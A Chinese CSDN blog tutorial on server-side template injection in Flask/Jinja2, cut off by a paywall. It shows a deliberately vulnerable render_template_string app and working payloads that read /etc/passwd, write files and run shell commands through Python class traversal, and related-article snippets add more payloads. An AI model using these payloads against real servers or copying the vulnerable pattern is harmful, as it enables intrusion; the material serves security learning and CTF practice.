python 模板注入_SSTI模板注入

最新推荐文章于 2024-04-08 10:42:42 发布
最新推荐文章于 2024-04-08 10:42:42 发布
阅读量498 收藏
点赞数
文章标签: python 模板注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39988930/article/details/111424452
版权
前言又划水了一天,最后划累了学习了一会,写了这篇文章,又遇到的hexo遇见花括号解析错误的问题,一点点把文章断点才解决(hexo断点调试SSTI介绍SSTI,服务端模板注入攻击,发生在MVA框架的view层中。注入原因:服务端接收了用户的输入,将未过滤的数据传给引擎解析,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题测试SSTI...
摘要由CSDN通过智能技术生成

前言

又划水了一天,最后划累了学习了一会,写了这篇文章,又遇到的hexo遇见花括号解析错误的问题,一点点把文章断点才解决(hexo断点调试

SSTI介绍

SSTI,服务端模板注入攻击,发生在MVA框架的view层中。

注入原因:

服务端接收了用户的输入,将未过滤的数据传给引擎解析,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题

测试SSTI的流程方式如下图:

SSTI for Flask

Flask的模板引擎为Jinja2,而主要出现问题的函数为render_template_string(),并没有渲染模板文件,直接把字符串渲染到了html,如果不经过过滤则很容易造成恶意代码注入问题。

实战过程

代码搭建1

2

3

4

5

6

7

8from flask import Flask, render_template_string, request

app = Flask(__name__)

def ():

name = request.args.get('name')

template = '

hello {}!

'.format(name)

return render_template_string(template)

app.run()

注入检测

通过payload:1+1的返回为2可以得知存在注入。

导出config变量和session

可以通过config和session进行导出

读/写文件

读文件

通过payload

1

2().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()

''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['file']('/etc/passwd').read()

以上两种payload都可以进行文件读取

写文件

同样也是两种payload,这里只列举一种了(其实可以通过Fuzz获得多种

1{ { ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('test') }}

命令执行1

2

3

4

5

6

7

8

9().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals['linecache'].os.system('ls')

().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").system("ls")')

# 重新载入__builtins__:

().__class__.__bases_

最低0.47元/天 解锁文章
weixin_39988930
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSTI模板注入
0verWatch的博客
02-08 1万+
先入个门 Jimja2 Jinja2是默认的仿Django模板的一个模板引擎,由Flask的作者开发。网上搜的语法2333,方便自己回顾 模板 {{ ... }}:装载一个变量,模板渲染的时候,会使用传进来的同名参数这个变量代表的值替换掉。 {% ... %}:装载一个控制语句。 {# ... #}:装载一个注释,模板渲染的时候会忽视这中间的值 变量 在模板中添加变量,可以使用(set)语句。 ...
模板注入SSTi笔记
jie_a的博客
04-14 319
模板注入SSTijinja2Smarty模板 jinja2 命令执行 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('在这里输命令').read()") }}{% endif %}{% endfor %} 文件读写 {% for c
python沙箱逃逸一些套路的小结
Sp4rkW的博客
05-21 9799
前言 总结一下各大赛事中的沙箱逃逸题,感觉还是很好玩的~ 先说一下自己对于这种沙箱逃逸题的理解吧,关键在于绕过,一般就是逼你用一些特别的操作去绕过他ban掉的函数,得到flag 空说无意,我们直接来看比赛中的一些题目~ 2018 ciscn(国赛)题RUN 它过滤了一些危险函数,比如:os、sys等等,但我们可以通过类的继承关系找到被ban掉的库,然后将它导入进来。比如: ().__c...
SSTIpython模板注入)整理
最新发布
一只懒猫的博客
04-08 347
在使用django框架进行web应用设计时,不规范的代码使用。常用的的dgango代码为:还可以设置动态网址,python使用的web框架可以使用以下方法进行测试。
模板注入SSTI漏洞学习笔记
hauzhao的博客
09-24 1451
SSIT介绍 render_template函数的渲染出了问题,往往对用户输入的变量不做渲染,SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornado django,php的smarty twig,java的jade velocity。当这些框架对运用渲染函数生成html的时候会出现SSTI
python SSTI注入
weixin_44843084的博客
06-21 741
https://www.jianshu.com/p/a77c50dfebcb https://xz.aliyun.com/t/3679#toc-9 SSTI(Server-Side Template Injection) 服务端模板注入,就是服务器模板中拼接了恶意用户输入导致各种漏洞。通过模板,Web应用可以把输入转换成特定的HTML文件或者email格式 {{ ... }}:装载一个变量,模板渲染的时候,会使用传进来的同名参数这个变量代表的值替换掉。 {% ... %}:装载一个控制语句。 {# ...
Web_python_template_injection(Python模块注入
Welcome To Myon'Blog !
04-11 1338
Python的模块注入 flask/jinja2 常用于ssti的魔术方法 获取基类的几种方法 获取基本类的子类 采用os模块的listdir函数来读取目录 常用payload
模板注入与_FLASK.pdf
01-02
**模板注入(SSTI)详解** 模板注入,全称为Server Side Template Injection,是一种常见的Web应用程序安全漏洞,它允许攻击者将恶意输入作为模板字符串的一部分,从而在服务端的模板引擎解析时执行函数调用或命令,...
gentlexue#POC-3#Apache OfBiz 服务器端模板注入SSTI)1
07-25
Apache OfBiz 服务器端模板注入SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI)的影响,从而导致远程代码执行
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
2015年黑帽大会上 James Kettle 讲解了《Server-Side Template Injection: RCE for the modern webapp》,从服务端模板注入的形成到检测,再到验证和利用都进行了详细的介绍,本资源为原文。
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板模板引擎旨在通过将固定模板与易失性数据结合来生成网页。 当用户输入直接连接...
tplmap.zip
07-26
模板注入通常发生在应用使用模板引擎解析用户输入时,没有对输入数据进行充分的验证和过滤。这些模板引擎如Jinja2、Smarty、FreeMarker等,在处理动态内容时,如果直接将未经处理的用户输入嵌入到模板中,就可能导致...
BJDCTF 2nd WEB
A_dmin的博客
03-24 7336
BJDCTF 2nd WEB emmm,比赛做了几道题,赛后官方给了wp,把没做出来的复现一下,,,, [BJDCTF 2nd]fake google 一个SSTI,发现是jinja2的,直接用payload打就行: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='_IterationGuard' %...
2021-BUGKU-做题记录-WEB
weixin_38131137的博客
07-04 910
1、Simple_SSTI_1 进行判断 {{2*'7'}}=77 那么就是jinjia2的注入模板 先进行第一步尝试 {{[].__class__.__base__.__subclasses__()}} 查找 判断其位于177为 但是往下走不通了,需要另辟道路 想了半天,就直接config吧 好吧,直接出来了 ps:自己想复杂了 2、Simple_SSTI_2 一样,{{[].__class__.__base__.__subclasses__()[177].__init__.func_globa
python模板注入(多种方法,CTF可直接使用)
weixin_47696216的博客
05-21 2009
CTF各种SSTI解题思路与方法
python沙箱逃逸小结
Assassin
11-11 8561
之前碰到了flask模板的漏洞的时候接触过python的一些东西,之前没时间去细看,现在看感觉很强悍,简单总结一下 首先我们不说原理了,也不是太明白,我们直接讲利用,一些python好玩的特性1.内联函数python的内敛函数真是强大,可以调用一切函数做自己想做的事情 我们输入dir('builtins')发现如下 我们在python的object类中集成了很多的基础函数,我们想要调用的时
解网鼎杯一道web题(Calc)
洞若观火
08-23 2413
探测:roboot.txt 回显: Traceback (most recent call last):   File "/usr/local/lib/python2.7/dist-packages/tornado/web.py", line 1520, in _execute     result = self.prepare()   File "/usr/local/lib/python2....
python __reduce__魔法方法_关于python魔术方法payload:"".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd"...
weixin_39737757的博客
11-28 217
总览"".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read()其实就是类似java的反射,通过一个对象找到另一个对象,这里通过一个字符串对象,找了一个文件对象,然后初始化,读取,就是这么个事。# 获得一个字符串实例>>> ""''# 获得字符串的type实例>>> "".__class__# 获得其父类>>> "".__cl...
bugkuctfweb题解simple_ssti_1
06-28
simple_ssti_1 是一个使用 Flask 框架编写的 web CTF 题目,主要涉及到服务器端模板注入 (Server-Side Template Injection, SSTI) 的问题。 这个题目中,使用者可以在输入框中输入任意字符串,然后后端会将这个字符...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值